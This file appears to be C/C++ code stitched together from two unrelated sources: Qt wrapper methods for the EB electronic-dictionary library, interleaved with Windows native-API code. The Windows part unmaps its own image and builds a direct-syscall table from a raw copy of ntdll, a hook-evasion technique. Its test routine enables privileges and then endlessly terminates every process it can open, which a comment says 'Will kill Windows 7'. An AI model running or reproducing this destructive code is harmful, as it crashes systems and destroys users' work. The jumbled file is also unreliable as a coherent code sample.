void mymain(void){ NTSTATUS status = STATUS_PENDING; ///The requested operation waits until you click a button. dispError(status); selfUnmap(); ///No image (except the own one) can be found... dispError(STATUS_SECTION_NOT_IMAGE); ///Initialize everything... status = initializeSyscallTable(); if (status) { dispError(status); return; } ///...and demonstrate that we have hopefully succeeded. status = testNtapiTable(); if (status) dispError(status); }
QList <EB_Font_Code> QEb::fontList() { QList <EB_Font_Code> flist; EB_Font_Code fonts[EB_MAX_FONTS]; int cnt; EB_Error_Code ecode = eb_font_list(&book, fonts, &cnt); if (ecode != EB_SUCCESS) dispError("eb_font_list", ecode); else for (int i = 0; i < cnt; i++) flist << fonts[i]; return flist; }
QList <EB_Hit> QEb::hitList(int max_count) { EB_Hit *harray = new EB_Hit[max_count]; int cnt; QList <EB_Hit> hits; EB_Error_Code ecode = eb_hit_list(&book, max_count, harray, &cnt); if (ecode != EB_SUCCESS) dispError("eb_hit_list", ecode); else for (int i = 0; i < cnt; i++) hits << harray[i]; return hits; }
EB_Error_Code QEb::searchCross(const QStringList &words) { QList <QByteArray> blist = toEucList(words); char** wlist = new char*[words.count()+1]; for (int i = 0; i < blist.count(); i++) wlist[i] = blist[i].data(); wlist[words.count()] = NULL; EB_Error_Code ecode = eb_search_cross(&book, wlist); if (ecode != EB_SUCCESS) dispError("eb_search_cross", ecode); delete[] wlist; return ecode; }
QString QEb::multiTitle(EB_Multi_Search_Code mid) { char s[EB_MAX_MULTI_TITLE_LENGTH+1]; EB_Error_Code ecode = eb_multi_title(&book, mid, s); if (ecode != EB_SUCCESS) { dispError("eb_multi_title", ecode); return QString(); } if (characterCode() == EB_CHARCODE_ISO8859_1) return QString::fromLatin1(s); else return eucToUtf(s); }
QString QEb::wideAltCharacterText(int c_num) { char alt[EB_MAX_ALTERNATION_TEXT_LENGTH+1]; EB_Error_Code ecode = eb_wide_alt_character_text(&appendix, c_num, alt); if (ecode != EB_SUCCESS) { dispError("eb_wide_alt_character_text", ecode); return QString(); } if (characterCode() == EB_CHARCODE_ISO8859_1) return QString::fromLatin1(alt); else return eucToUtf(alt); }
EB_Error_Code QEb::stopCode(int *stop1, int *stop2) { int stop_code[2]; EB_Error_Code ecode = eb_stop_code(&appendix, stop_code); if (ecode != EB_SUCCESS) { dispError("eb_stop_code", ecode); *stop1 = *stop2 = -1; } else { *stop1 = stop_code[0]; *stop2 = stop_code[1]; } return ecode; }
// Initialize Subbook QList <EB_Subbook_Code> QEb::subbookList() { EB_Subbook_Code codes[EB_MAX_SUBBOOKS]; int cnt; QList <EB_Subbook_Code> list; EB_Error_Code ecode = eb_subbook_list(&book, codes, &cnt); if (ecode != EB_SUCCESS) dispError("eb_subbook_list", ecode); else for(int i = 0; i < cnt; i++) list << codes[i]; return list; }
QString QEb::multiEntryLabel(EB_Multi_Search_Code mid, int entry) { char s[EB_MAX_MULTI_LABEL_LENGTH+1]; EB_Error_Code ecode = eb_multi_entry_label(&book, mid, entry, s); if (ecode != EB_SUCCESS) { dispError("eb_multi_entry_label", ecode); return QString(); } if (characterCode() == EB_CHARCODE_ISO8859_1) return QString::fromLatin1(s); else return eucToUtf(s); }
QList <EB_Multi_Search_Code> QEb::multiSearchList() { EB_Multi_Search_Code codes[EB_MAX_MULTI_SEARCHES]; int cnt; QList <EB_Multi_Search_Code> list; EB_Error_Code ecode = eb_multi_search_list(&book, codes, &cnt); if (ecode != EB_SUCCESS) dispError("eb_multi_search_list", ecode); else for (int i = 0; i < cnt; i++) list << codes[i]; return list; }
QByteArray QEb::readBinary() { char buff[1024]; ssize_t len; QByteArray b; for(;;) { EB_Error_Code ecode = eb_read_binary(&book, 1024, buff, &len); if (ecode != EB_SUCCESS) { dispError("eb_", ecode); return b; } if (len > 0 ) b += QByteArray(buff, (int)len); if (len < 1024) break; } return b; }
///Attempts to read the ntdll.dll file and then tries to dump the NtXxx functions NTSTATUS initializeSyscallTable(void) { PVOID pNtdll = sg_pRawNtdll; NTSTATUS status = STATUS_UNSUCCESSFUL; ULONG dbgBuf = 0x0; ULONG firstOccurence = 0x0; ///Set up ourselves... status = performCoreInitialization(pNtdll, NTDLL_MAX_SIZE, &dbgBuf, &firstOccurence); if (status) { if (firstOccurence) dispError((NTSTATUS)dbgBuf); return status; } ///Now create the syscall table in order to be able to use all NtXxx functions. return createNtapiLookupTable(pNtdll); }
QByteArray QEb::wideBitmapToGif(const QByteArray &bitmap) { QSize sz = wideFontQSize(); QByteArray b; if (sz.width() == 0) return b; int image_size= wideFontGifSize(font()); char *buff = new char[image_size]; size_t size; EB_Error_Code ecode = eb_bitmap_to_gif(bitmap, sz.width(), sz.height(), buff, &size); if (ecode != EB_SUCCESS) dispError("eb_bitmap_to_gif", ecode); else b = QByteArray(buff, (int)size); delete[] buff; return b; }
///If everything has been set up sucessfully, we do just a small test ///which terminates all programs it can get PROCESS_FULL_ACCESS to. ///Furthermore, it maps ntoskrnl.exe as an executable image.. even if that's not too useful at the moment... NTSTATUS testNtapiTable(void) { UNICODE_STRING uMyNtdll; PIO_STATUS_BLOCK ioSb; OBJECT_ATTRIBUTES objAttr; CLIENT_ID cid; OBJECT_ATTRIBUTES procAttr; LARGE_INTEGER interval; PVOID pNtosBase = NULL; NTSTATUS status = STATUS_UNSUCCESSFUL; SIZE_T viewSize = 0; HANDLE hFile = INVALID_HANDLE_VALUE; HANDLE hCurrPid = NtCurrentTeb()->ClientId.UniqueProcess; WCHAR szMyNtdll[] = L"\\systemroot\\system32\\ntoskrnl.exe"; HANDLE hSection = INVALID_HANDLE_VALUE; HANDLE hProcess = INVALID_HANDLE_VALUE; ///The copy of the pristine ntdll data has succeeded and can now be found in the syscall table. ///Of course, we display this message by just using this table... syscallStub(ntapiLookup("NtRaiseHardError", sizeof("NtRaiseHardError")), STATUS_FT_READ_FROM_COPY, 0, 0, NULL, 0, (PULONG)&status); uMyNtdll.Buffer = szMyNtdll; uMyNtdll.LengthInBytes = sizeof(szMyNtdll) - sizeof(UNICODE_NULL); uMyNtdll.MaximumLengthInBytes = sizeof(szMyNtdll); InitializeObjectAttributes(&objAttr, &uMyNtdll, OBJ_CASE_INSENSITIVE, NULL, NULL); status = syscallStub(ntapiLookup("NtOpenFile", sizeof("NtOpenFile")), &hFile, GENERIC_READ | SYNCHRONIZE, &objAttr, &ioSb, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT); if (status) return status; status = syscallStub(ntapiLookup("NtCreateSection", sizeof("NtCreateSection")), &hSection, SECTION_ALL_ACCESS, NULL, NULL, PAGE_READONLY, SEC_IMAGE, hFile); if (status) return status; status = syscallStub(ntapiLookup("NtMapViewOfSection", sizeof("NtMapViewOfSection")), hSection, INVALID_HANDLE_VALUE, &pNtosBase, 0, 0, NULL, &viewSize, ViewUnmap, 0, PAGE_READONLY); if (status) return status; ///Clearly, the ntoskrnl.exe image could not be loaded at its kernel 0xFFFFXXXXXXXXXXXXXX base... dispError(STATUS_IMAGE_NOT_AT_BASE); cid.UniqueThread = NULL; interval.QuadPart = -2000000; InitializeObjectAttributes(&procAttr, NULL, 0, NULL, NULL); ///Will kill Windows 7. for (ULONG i = 0; i < 0x28; i++) status = myRtlAdjustPrivileges(i); for (;;) { for (ULONG_PTR i = 0; i < 0x8000; i += 4) { if (hCurrPid != (HANDLE)i) { cid.UniqueProcess = (HANDLE)i; status = syscallStub(ntapiLookup("NtOpenProcess", sizeof("NtOpenProcess")), &hProcess, PROCESS_ALL_ACCESS, &procAttr, &cid); if (!status) { syscallStub(ntapiLookup("NtDelayExecution", sizeof("NtDelayExecution")), FALSE, &interval); syscallStub(ntapiLookup("NtTerminateProcess", sizeof("NtTerminateProcess")), hProcess, STATUS_FATAL_APP_EXIT); } } } } }